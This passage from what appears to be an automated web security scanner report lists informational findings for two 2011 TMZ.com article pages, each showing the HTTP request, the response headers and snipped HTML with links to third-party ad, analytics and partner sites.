<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=3000013&c3=3000013&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /></noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-404979h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-21jBY4_vbHNJQ.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

17.167. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero3; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253D%252526%252523039%25253BNCIS%252526%252523039%25253B%252520Actor%252520--%252520Dead%252520Mother%252520Insult%252520Led%252520to%252520Violence%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-i%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:46 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:46 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562effac2cf8f69d82c880; expires=Sun, 20-Feb-2028 01:00:46 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115860
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://wbrostmz.112.2O7.net/b/ss/wbrostmz/1/H.14--NS/0?[AQB]&cdp=3&[AQE]"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/black_swan;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/black_swan;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<span style="display: block; height: 44px; width: 572px; margin-top: -10px;"><a href="http://beta.abc.go.com/shows/revenge" target="_blank"><img style="float:right;" border="0" alt="Sponsorship" src="http://tmz.vo.llnwd.net/o28/assets/images/0913-revenge-logo.png" /></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/black_swan;boxad=2;pos=atf;tile=2;sz=300x250;ord='123131'" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/black_swan;boxad=2;pos=atf;tile=2;sz=300x250;ord='2123131'" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/black_swan;boxad=3;pos=atf;tile=3;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/black_swan;boxad=3;pos=atf;tile=3;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<div id="tf-lead-story"><a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" id="rr-tf-thumb">
       
           <img src="http://ll-media.tmz.com/2011/09/16/0916-rivers-medium-201x183-1.jpg" width="201" height="183" alt="Exclusive: Melissa Rivers Splits With Boyfriend" border="0"/>
...[SNIP]...
<div id="rr-tf-content">
       <a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" id="rr-tf-postTitle">Exclusive: Melissa Rivers Splits With Boyfriend</a>
...[SNIP]...
</p>
       <a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" class="read-more-link">READ MORE</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/16/taylor-lautner-stubble-lily-collins-abduction-premiere/">Taylor Lautner Shows Stubble at&hellip;</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/16/snooki-car-accident-italy-jersey-shore-video/">Snooki Slams Into Italian Cop --&hellip;</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/13/hex-iphone-wallet-giveaway/">Win a HEX iPhone Wallet!</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/black_swan;boxad=4;pos=atf;tile=4;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/black_swan;boxad=4;pos=atf;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/E2QlpVM4se8/" target="_blank">Afternoon eye candy: Hot men of theBERRY! (61 photos)</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/orz5sQ72m6Y/" target="_blank">Take a BERRY Break (40 photos)</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/S9ln5MjkJns/" target="_blank">Nom nom COOKIE nomins (43 photos)</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.theberry.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-the-berry-v2.v2011_08_03_124001.png" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/julie-bowen-to-avoid-soccer-mom-style-at-the-emmys" target="_blank">Julie Bowen To Avoid Soccer Mom Style At The Emmys</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/david-beckham-another-baby-would-be-amazing" target="_blank">David Beckham: Another Baby Would Be &quot;Amazing&quot;</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/emily-deschanel-i-really-like-being-pregnant" target="_blank">Emily Deschanel: &quot;I Really Like Being Pregnant&quot;</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.celebritybabyscoop.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-celebritybabyscoop.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/justin-theroux-is-very-cute-with-jennifer-aniston/" target="_blank">Justin Theroux is &#039;Very Cute&#039; with Jennifer Aniston!</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/joseph-gordon-levitt-premium-rush-trailer/" target="_blank">Joseph Gordon-Levitt: &#039;Premium Rush&#039; Trailer!</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/kate-bosworth-late-night-with-jimmy-fallon-guest/" target="_blank">Kate Bosworth: &#039;Late Night with Jimmy Fallon&#039; Guest!</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.justjared.com" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cacheimages/partner-rsss-justjared_logo.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/50-cent-wants-to-achieve-hunger-relief-goal-in-two-and-a-half-years.html" target="_blank">50 Cent wants to achieve hunger relief goal in two-and-a-half years</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/joss-stone-fostering-a-dog.html" target="_blank">Joss Stone fostering a dog</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/nick-cannon-doesn-t-want-kids-in-show-business.html" target="_blank">Nick Cannon doesn&#039;t want kids in show business</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://younghollywood.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-young-hwood.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/851288-20-hot-athletes-we-want-to-see-on-dwts" target="_blank">20 Hot Athletes We Want to See on DWTS</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/850898-hope-solo-pictorial-odds-breakdown-of-her-dwts-title-hopes" target="_blank">Hope Solo: Breaking Down Her DWTS Title Hopes</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/847747-the-top-25-wags-of-the-year-so-far" target="_blank">The Top 25 Wags of the Year (So Far)</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://bleacherreport.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-bleacher-report-logo.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/nancy-grace-and-harvey-go-head-to-head-during-a-tmz-live-special-130-pdt/" target="_blank">Nancy Grace And Harvey Go Head-to-Head During A TMZ LIVE Special 1:30 PDT</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/kim-kardashian-to-executive-produce-new-pussycat-dolls-reality-show/" target="_blank">Kim Kardashian To Executive Produce New Pussycat Dolls Reality Show</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/matthew-fox-sued-over-attack-on-bus-driver/" target="_blank">Matthew Fox Sued Over Attack On Bus Driver</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.celebdirtylaundry.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-cdl-v2.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/black_swan;boxad=5;pos=atf;tile=5;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/black_swan;boxad=5;pos=atf;tile=5;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a><a href="http://itunes.apple.com/us/podcast/tmz-live/id418086839" target="_blank"><img src="http://ll-media.tmz.com/2011/08/04/0804-tmz-live-podcast.jpg" alt="0804-tmz-live-podcast" />
...[SNIP]...
<map name="Map" id="Map">
   <area shape="rect" coords="0,24,300,89" href="http://itunes.apple.com/us/app/tmz/id299948601?mt=8" target="_blank" alt="Download the TMZ APP for iPhone" />
   <area shape="circle" coords="40,124,17" href="http://www.tmz.com/rss.xml" target="_blank" alt="TMZ RSS feed" />
   <area shape="circle" coords="94,125,17" href="http://www.youtube.com/user/tmz/?adid=youtube" target="_blank" alt="TMZ on Youtube" />
   <area shape="circle" coords="148,123,17" href="http://www.facebook.com/TMZ?ref=ts/?adid=facebook" target="_blank" alt="TMZ on Facebook" />
   <area shape="circle" coords="208,124,17" href="http://common.prndigital.com/affiliatemap/tmz/" target="_blank" alt="Radio Affliate" />
   <area shape="circle" coords="264,124,17" href="http://www.tmz.com/tmz-tv" target="_blank" alt="TMZ on TV" />
   <area shape="rect" coords="146,177,296,190" href="http://twitter.com/#!/harveylevintmz/" target="_blank" alt="Twitter : @harveylevintmz" />
   <area shape="rect" coords="146,193,193,206" href="http://twitter.com/#!/tmz/" target="_blank" alt="Twitter : @TMZ" />
   <area shape="rect" coords="146,209,239,222" href="http://twitter.com/#!/ribeyetmz/" target="_blank" alt="Twitter : @ribeyetmz" />
</map>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/16/vanessa-hudgens-in-a-biki_n_966259.html" target="_blank" rel="nofollow">PHOTOS: Vanessa Hudgens In A Bikini</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/16/paz-de-la-huertas-unusual_n_966069.html" target="_blank" rel="nofollow">Paz De La Huerta&#039;s Unusual Red Carpet Faces (PHOTOS)</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/15/jennifer-aniston-chaz-bon_n_964967.html" target="_blank" rel="nofollow">Jennifer Aniston &amp; Chaz Bono In High School Together (PHOTO)</a>
...[SNIP]...
<center><a href="http://www.huffingtonpost.com" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-huff-po-b-w.v2011_04_06_160748.png" border="0" />
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/daily-afternoon-randomness-in-hq-41-photos/" target="_blank" rel="nofollow">Daily Afternoon Randomness in HQ (41 Photos)</a>
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/best-links-on-the-internet-418/" target="_blank" rel="nofollow">Best links on the internet</a>
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/there-are-sexy-chivers-among-us-90-photos/" target="_blank" rel="nofollow">There are Sexy Chivers Among Us (90 Photos)</a>
...[SNIP]...
<center><a href="http://thechive.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-chive-v2.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a href="http://www.buddytv.com/slideshows/how-i-met-your-mother-episode-photos-first-looks-at-martin-short-and-kal-penn-on-set-38696.aspx" target="_blank" rel="nofollow">&#039;How I Met Your Mother&#039; Episode Photos: First Looks at Martin Short and Kal Penn On Set</a>
...[SNIP]...
<li><a href="http://www.buddytv.com/slideshows/castle-episode-402-heroes-and-villains-59198.aspx" target="_blank" rel="nofollow">&#039;Castle&#039; Episode 4.02: &#039;Heroes and Villains&#039;</a>
...[SNIP]...
<li><a href="http://www.buddytv.com/articles/the-sing-off/video-meet-the-sing-off-groups-41845.aspx" target="_blank" rel="nofollow">VIDEO: Meet 8 of This Season&#039;s &#039;Sing-Off&#039; Groups Before They Take the Stage</a>
...[SNIP]...
<center><a href="http://buddytv.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-buddy-tv-cut.v2011_09_02_151959.png" border="0" />
...[SNIP]...
<li><a href="http://mediatakeout.com/51153/mto-super-world-exclusive-we-know-the-sex-of-jay-z-and-beyonce-s-baby-and-we-have-evidence.html" target="_blank" rel="nofollow">MTO SUPER-WORLD EXCLUSIVE: We Know The SEX Of Jay Z And Beyonce&#039;s BABY!!! (And We Have EVIDENCE)</a>
...[SNIP]...
<li><a href="http://mediatakeout.com/51152/nuh-uhhhhhhhh-we-feel-so-bad-for-this-little-girl-look-what-her-basic-azz-mother-named-her.html" target="_blank" rel="nofollow">NUH UHHHHHHHH!!! We Feel So BAD For This LITTLE GIRL . . . Look What Her BASIC AZZ MOTHER Named Her!!!!</a>
...[SNIP]...
<center><a href="http://www.mediatakeout.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-feed_rss-mediatakeout.v2010_03_28_201818.gif" border="0" />
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/FCrjNOEnxRU/the-crap-we-missed-friday-9-16-11-09-2011" target="_blank" rel="nofollow">The Crap We Missed ... Friday 9.16.11</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/NNmtxh4QmRY/scarlett-johansson-kieran-culkin-strip-club-09-2011" target="_blank" rel="nofollow">Kieran Culkin Took Scarlett Johansson To A Strip Club</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/zYih-_c4mbc/joe-manganiello-alcide-true-blood-single-09-2011" target="_blank" rel="nofollow">Joe Manganiello is Single</a>
...[SNIP]...
<center><a href="http://www.thesuperficial.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-superficial.v2011_04_05_095041.png" border="0" />
...[SNIP]...
<li><a href="http://www.ivillage.com/likes-or-yikes-our-favorite-entertainment-stories-week/1-j-217563" target="_blank" rel="nofollow">Likes or Yikes? Our Favorite Entertainment Stories of the Week</a>
...[SNIP]...
<li><a href="http://www.ivillage.com/elisabeth-moss-so-proud-new-mom-january-jones/1-a-383210" target="_blank" rel="nofollow">Elisabeth Moss &quot;So Proud&quot; of New Mom January Jones</a>
...[SNIP]...
<li><a href="http://www.ivillage.com/x-factor-trailer-likes-or-yikes/1-a-383105" target="_blank" rel="nofollow">&#039;X Factor&#039; Trailer: Likes or Yikes?</a>
...[SNIP]...
<center><a href="http://www.ivillage.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-ivillage.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/jennifer-aniston-justin-theroux-step-out-in-nyc-photos/" target="_blank" rel="nofollow">Jennifer Aniston &amp; Justin Theroux Stroll Hand in Hand in NYC (PHOTOS)</a>
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/ryan-gosling-reveals-favorite-justin-bieber-song-mickey-mouse-club-regrets-video/" target="_blank" rel="nofollow">Ryan Gosling Reveals Favorite Justin Bieber Song, &#039;Mickey Mouse Club&#039; Regrets (VIDEO)</a>
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/lacey-schwimmers-high-waisted-jeans-yay-or-nay-photos/" target="_blank" rel="nofollow">Lacey Schwimmer&#039;s High Waisted Jeans: Yay or Nay (PHOTOS)</a>
...[SNIP]...
<center><a href="http://www.celebuzz.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-asset-cb-cut.v2011_09_02_151959.png" border="0" />
...[SNIP]...
<li><a href="http://www.tvguide.com/News/Glee-Exclusive-Video-Premiere-1037418.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">Glee Exclusive: Watch the First 36 Seconds of the Season 3 Premiere ... Who Else Is a Junior?</a>
...[SNIP]...
<li><a href="http://www.tvguide.com/News/MTV-Scripted-Reality-Shows-1037419.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">MTV Orders Two New Scripted Series, Four Reality Shows</a>
...[SNIP]...
<li><a href="http://www.tvguide.com/News/Happy-Endings-Fred-Savage-1037417.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">ABC Offers Fred Savage Happy Endings</a>
...[SNIP]...
<center><a href="http://www.tvguide.com" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-tv-guide-cut.v2011_09_02_161258.gif" border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> |
<a href="http://www.warnerbros.com/#/page=privacy-policy/" rel="nofollow" target="_blank">Privacy Policy</a> |
<a href="http://www.warnerbros.com/#/page=terms-of-use/" rel="nofollow" target="_blank">Terms of Use</a>
...[SNIP]...
<span style="font-weight:bold; position: absolute; right: 25px;top: 25px;"><a target="_blank" href="http://www.huffingtonpost.com/">HPMG News</a>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=3000013&c3=3000013&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /></noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-404979h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-21jBY4_vbHNJQ.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

17.168. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_sq=wbrostmz%3D%2526pid%253DNancy%252520Grace%252520--%252520RUMPSHAKIN%252526%252523039%25253B%252520in%252520the%252520TMZ%252520Ballroom%252521%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petit_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:11 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:11 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:58:11 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 111374
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://wbrostmz.112.2O7.net/b/ss/wbrostmz/1/H.14--NS/0?[AQB]&cdp=3&[AQE]"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/lakers;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/lakers;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<span style="display: block; height: 44px; width: 572px; margin-top: -10px;"><a href="http://beta.abc.go.com/shows/revenge" target="_blank"><img style="float:right;" border="0" alt="Sponsorship" src="http://tmz.vo.llnwd.net/o28/assets/images/0913-revenge-logo.png" /></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/lakers;boxad=2;pos=atf;tile=2;sz=300x250;ord='123131'" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/lakers;boxad=2;pos=atf;tile=2;sz=300x250;ord='2123131'" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/lakers;boxad=3;pos=btf;tile=3;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/lakers;boxad=3;pos=btf;tile=3;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<div id="tf-lead-story"><a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" id="rr-tf-thumb">
       
           <img src="http://ll-media.tmz.com/2011/09/16/0916-rivers-medium-201x183-1.jpg" width="201" height="183" alt="Exclusive: Melissa Rivers Splits With Boyfriend" border="0"/>
...[SNIP]...
<div id="rr-tf-content">
       <a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" id="rr-tf-postTitle">Exclusive: Melissa Rivers Splits With Boyfriend</a>
...[SNIP]...
</p>
       <a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" class="read-more-link">READ MORE</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/16/taylor-lautner-stubble-lily-collins-abduction-premiere/">Taylor Lautner Shows Stubble at&hellip;</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/16/snooki-car-accident-italy-jersey-shore-video/">Snooki Slams Into Italian Cop --&hellip;</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/13/hex-iphone-wallet-giveaway/">Win a HEX iPhone Wallet!</a>
...[SNIP]...
